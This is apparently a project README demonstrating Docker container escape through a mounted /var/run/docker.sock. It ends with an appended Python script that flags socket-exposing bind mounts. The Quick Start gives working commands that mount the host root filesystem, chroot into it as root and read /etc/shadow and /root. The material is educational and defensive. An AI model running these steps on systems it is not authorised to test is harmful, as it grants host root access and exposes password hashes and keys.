# Docker.sock Breakout
A proof-of-concept showing how mounting `/var/run/docker.sock` into a container gives root access to the host.

This project demonstrates a critical Docker misconfiguration. By mounting the Docker Unix socket into a container, the container can communicate with the host Docker daemon, and effectively escape its sandbox, escalate privileges, and fully control the host.

## TL;DR

Mounting `/var/run/docker.sock` gives the container root-level access to the host.

## Project Structure

```
docker-sock-breakout/
├── Dockerfile
├── docker-compose.yml
└── exploit.sh
```

## How It Works

1. A container is started with `-v /var/run/docker.sock:/var/run/docker.sock`
2. Inside the container, Docker CLI is available
3. We use Docker inside the container to run another container
4. That second container mounts `/` from the host and runs `chroot /host`
5. Now we're inside the host, as root

## Quick Start

### 1. Build and Run

```bash
git clone https://github.com/CyberSquirrel-AI/docker-sock-breakout.git
cd docker-sock-breakout
docker compose up -d
docker exec -it docker-sock-breakout sh
```

### 2. Inside the Container

```bash
docker ps
docker run -it --rm -v /:/host alpine
```

### 3. Inside the Alpine container

```bash
chroot /host
hostname
id
ls /root
cat /etc/shadow
```

## Impact

- Full host filesystem access
- Run arbitrary containers as `--privileged`
- Read sensitive files like `/etc/shadow`, `/root/.ssh/`
- Install rootkits or persist on host
- Pivot to other containers, networks, volumes

## Mitigation

- Do NOT mount `/var/run/docker.sock` into untrusted containers

## Disclaimer

This project is for educational purposes only. Do not run this on any system you don't own or have permission to test. You are responsible for your actions.

...
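To check a host against the Mitigation section, the following added example (not part of the original project) parses `docker inspect` JSON and flags containers whose bind mounts expose the Docker socket. It goes slightly beyond the case on this page by also flagging parent directories such as `/` or `/var/run`; the sample data and every container name except `docker-sock-breakout` are constructed.

```python
import json
import posixpath

# Usual daemon socket locations (/var/run is normally a symlink to /run).
SOCKET_PATHS = ("/var/run/docker.sock", "/run/docker.sock")


def exposes_socket(source):
    """True if a bind-mount source is the socket or a directory that contains it."""
    src = posixpath.normpath(source)
    return src == "/" or any(
        src == sock or sock.startswith(src + "/") for sock in SOCKET_PATHS
    )


def find_socket_exposure(inspect_json):
    """Return (container, source, destination, read_write) per risky bind mount."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "").lstrip("/")
        for mount in container.get("Mounts") or []:
            if mount.get("Type") == "bind" and exposes_socket(mount.get("Source", "")):
                # Read-only mounts are reported as well: the ro flag does not
                # prevent a process from connecting to a Unix socket.
                findings.append((name, mount["Source"],
                                 mount.get("Destination"), mount.get("RW", True)))
    return findings


# Constructed sample, shaped like `docker inspect` output and trimmed to the
# fields used above. All names except docker-sock-breakout are made up.
SAMPLE = json.dumps([
    {"Name": "/docker-sock-breakout", "Mounts": [
        {"Type": "bind", "Source": "/var/run/docker.sock",
         "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Name": "/web", "Mounts": [
        {"Type": "volume", "Source": "/var/lib/docker/volumes/web-data/_data",
         "Destination": "/data", "RW": True}]},
    {"Name": "/backup", "Mounts": [
        {"Type": "bind", "Source": "/", "Destination": "/host", "RW": False}]},
    {"Name": "/metrics", "Mounts": [
        {"Type": "bind", "Source": "/var/run", "Destination": "/host-run", "RW": False}]},
])

if __name__ == "__main__":
    for finding in find_socket_exposure(SAMPLE):
        print("EXPOSED: %s mounts %s at %s (rw=%s)" % finding)
```

On a real host, pass it the output of `docker inspect $(docker ps -q)` instead of `SAMPLE`.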